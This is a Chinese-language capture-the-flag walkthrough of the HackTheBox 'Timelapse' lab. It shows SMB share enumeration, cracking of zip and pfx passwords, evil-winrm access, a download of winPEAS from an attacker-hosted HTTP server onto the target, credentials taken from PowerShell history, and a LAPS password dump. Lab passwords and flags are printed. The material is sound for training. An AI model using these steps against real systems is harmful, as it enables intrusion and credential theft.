Hackthebox - Timelapse

靶场信息

靶场类型

信息搜集

Nmap

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.152
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-29 02:18 EDT
Nmap scan report for 10.10.11.152
Host is up (0.55s latency).
Not shown: 65525 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-29 14:19:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-03-29T14:21:28+00:00; +7h59m58s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
49674/tcp open  msrpc         Microsoft Windows RPC
51354/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-03-29T14:20:18
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   556.15 ms 10.10.16.1
2   556.22 ms 10.10.11.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.57 seconds

Smb

这台机器明显有 smb,先去找一下 guest 用户的票据

enum4linux -a -u "guset" -p "" 10.10.11.152

[+] Attempting to map shares on 10.10.11.152
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/ADMIN$   Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/C$       Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/IPC$     [E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/NETLOGON Mapping: OK     Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/Shares   Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.11.152/SYSVOL   Mapping: OK     Listing: DENIED

该 Shares 文件夹可供阅读,让我们看看里面有些什么

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# smbclient -U "guest" //10.10.11.152/Shares 
Enter WORKGROUP\guest's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 2323752 blocks available

有两个文件夹,去挨个查询一下

smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 2323752 blocks available

Dev 目录下有一个 winrm_backup.zip 压缩文件,下载下来看看

smb: \Dev\> get winrm_backup.zip 
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)

John

下载下来了,去查看一下

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:

需要解压密码,咱们没有啊,使用 john 尝试爆破一下

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: 2b chk, TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash    
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-29 21:46) 3.333g/s 11578Kp/s 11578Kc/s 11578KC/s surfroxy154..supergay01
Use the "--show" option to display all of the cracked passwords reliably
Session completed

解压密码是 supremelegacy 去解压一下

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx

漏洞利用

解压出来后有一个 pfx 文件,查询了一下 pfx 可以使用 openssl 提取出私钥,去提取一下

https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
Enter Import Password:
Mac verify error: invalid password?

提取时发现也需要密码,使用刚才 zip 爆破出来的密码尝试失败,再去爆破一下

    ┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# pfx2john legacyy_dev_auth.pfx > hashbis 

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashbis 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:58 DONE (2022-03-29 21:53) 0.008414g/s 27189p/s 27189c/s 27189C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

爆破出来密码 thuglegacy,然后再去提取一下

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -out prv.key          
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Enter Import Password:

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# ls
cert.crt  hash  hashbis  legacyy_dev_auth.pfx  nmap  prv.key  winrm_backup.zip

使用 evil-winrm 进行利用

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

成功拿到一个 user 权限

*Evil-WinRM* PS C:\Users\legacyy\Documents> type 'C:\Users\legacyy\Desktop\user.txt'
622218eb92f1c85ad186d6aee0dbdb53

成功拿到 user 权限的 flag 文件

权限提升

在本地开启一个 HTTP 服务

┌──(root💀kali)-[~/Desktop]
└─# python3 -m http.server 80                                    
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

使用 powershell 下载我们本地的 winPEAS.exe 辅助提权脚本

powershell "Invoke-WebRequest -UseBasicParsing 10.10.16.4/winPEASx64.exe -OutFile winPEASx64.exe"

然后运行

*Evil-WinRM* PS C:\Users\legacyy\Documents> powershell "Invoke-WebRequest -UseBasicParsing 10.10.16.4/winPEASx64.exe -OutFile winPEASx64.exe"
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 434B

发现了一个包含历史命令记录的文件,下载下来

download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

然后查看一下

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# cat ConsoleHost_history.txt                                                                         
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

尝试使用 laps.py 来进行操作

https://github.com/n00py/LAPSDumper/blob/main/laps.py

首先将添加一个本地 DNS 解析

echo 10.10.11.152 timelapse.htb >> /etc/hosts

然后执行

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# python3 laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
DC01$:C9(3OIh923TK13J.iADjN))A

拿到了一个密码

继续使用 evil-winrm 登录

┌──(root💀kali)-[~/Desktop/HTB/Easy/Timelapse]
└─# evil-winrm -i 10.10.11.152 -S -u Administrator -p 'C9(3OIh923TK13J.iADjN))A' 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator

成功拿到一个 administrator 权限

*Evil-WinRM* PS C:\users\TRX\Desktop> cat root.txt
365b8463a586a128c09558558d4deceb

成功拿到 root 权限的 flag 文件